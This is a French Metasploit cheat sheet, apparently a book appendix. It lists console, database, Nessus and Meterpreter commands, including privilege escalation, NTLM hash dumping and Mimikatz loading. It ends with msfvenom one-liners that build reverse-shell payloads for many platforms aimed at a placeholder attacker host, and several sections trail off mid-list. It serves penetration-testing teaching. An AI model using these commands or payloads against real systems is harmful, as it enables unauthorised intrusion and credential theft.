Aide-mémoire
Introduction
Afin de faciliter la réalisation des tests grâce à Metasploit, voici un aide-mémoire reprenant les commandes décrites dans ce livre.
Msfconsole
1. Les commandes de base
Lancer msfconsole |
: msfconsole |
Afficher la version de Metasploit |
: version |
Afficher la bannière de Metasploit |
: banner |
Se connecter à un port (type netcat) |
: connect |
Mettre à jour Metasploit sous Kali |
: apt install metasploit-framework |
Charger/Décharger un module |
: load / unload |
Définir/Supprimer une variable |
: set / unset |
Définir/Supprimer une variable globale |
: setg / unsetg |
Enregistrer les variables dans un fichier |
: save (/root/.msf4/config) |
2. Les commandes liées aux modules
Afficher l’ensemble des modules |
show |
Afficher des modules particuliers |
: show exploits/auxiliary/payloads/encoders |
Faire des recherches |
: search REGEXP |
Obtenir des infos sur un module |
: info <MODULE NAME> |
Obtenir les options d’un module |
: options <MODULE_NAME> |
Obtenir les options avancées d’un module |
: advanced <MODULE_NAME> |
Utiliser un module |
: use <MODULE_NAME> |
Afficher les options manquantes |
: show missing |
Éditer un module |
: edit |
Lancer un interpréteur Ruby |
: irb |
Lancer un module |
: exploit / run |
3. Les commandes liées à la base de données
Initialiser la base de données |
: msfdb init |
Afficher le statut de la base de données |
: db_status |
Réinitialiser la base de données |
: msfdb reinit |
Importer des données |
: db_import |
Exporter des données |
: db_export |
Intégrer les scans directement en base |
: db_nmap |
Afficher l’ensemble des services en base |
: services |
Afficher l’ensemble des hôtes en base |
: hosts |
Afficher l’ensemble des vulnérabilités |
: vulns |
4. Les commandes liées aux espaces de travail
Lister les espaces de travail |
: workspace |
Créer un espace de travail |
: workspace -a <NEW_WORKSPACE> |
Changer d’espace de travail |
: workspace <NEW_WORKSPACE> |
Supprimer un espace de travail |
: workspace -d <NEW_WORKSPACE> |
Supprimer tous les espaces |
: workspace -D |
5. Les commandes liées aux scanneurs de vulnérabilités
Nessus |
|
Charger le module Nessus |
: load nessus |
Connecter Metasploit à Nessus |
: nessus_connect |
Afficher l’ensemble des policies |
: nessus_policy_list |
Créer un nouveau scan Nessus |
: nessus_scan_new |
Afficher la liste des scans |
: nessus_scan_list |
Lancer un scan Nessus |
: nessus_scan_launch |
Afficher les rapports Nessus |
: nessus_report_hosts &nessus_report_vulns |
Télécharger... |
Meterpreter
1. Commandes de bases
Afficher l’aide |
: help |
Placer la session en tâche de fond |
: background |
Disposer d’un shell Ruby |
: irb |
Charger des modules Meterpreter |
: load <MODULE NAME> |
Changer de processus |
: migrate |
Faire appel à des fichiers ressources |
: resource |
Exécuter un module de post-exploitation |
: run <MODULE NAME> |
Obtenir le chemin courant sur la machine attaquante |
: getlwd |
Obtenir le chemin courant sur la machine victime |
: getwd |
Afficher les fichiers sur la machine attaquante |
: lls |
Afficher les fichiers sur la machine victime |
: ls |
Télécharger un fichier depuis la machine victime |
: download source destination |
Charger un fichier sur la machine victime |
: upload source destination |
Faire du forward de port |
: portfwd |
Transformer Meterpreter en shell standard |
: shell |
Exécuter une commande sur la machine victime |
: execute |
Obtenir un résumé des informations de la machine victime |
: sysinfo |
2. Les commandes avancées
Chercher des fichiers intéressants sur le disque |
: search |
Obtenir les droits SYSTEM (à partir d’un compte administrateur) |
: getsystem |
Obtenir les condensats LM/NTLM (injection en mémoire) |
: hashdump |
Obtenir les condensats LM/NTLM (base de registre) |
: smart_hashdump |
Charger le module Mimikatz |
: load mimikatz / load kiwi |
Charger le module Incognito |
: load incognito |
Migration d’un processus |
: migrate <PID> |
Démarrer l’enregistrement... |
MSFvenom
Linux :
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f elf > shell.elf
Windows :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f exe > shell.exe
Mac :
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f macho > shell.macho
PHP :
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f raw > shell.php
ASP :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f asp > shell.asp
JSP :
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f raw > shell.jsp
WAR :
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f war > shell.war
Python :
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f raw > shell.py
Bash :
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f raw > shell.sh
Perl :
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address>
LPORT=<Your Port to Connect On> -f raw > shell.pl
Mise...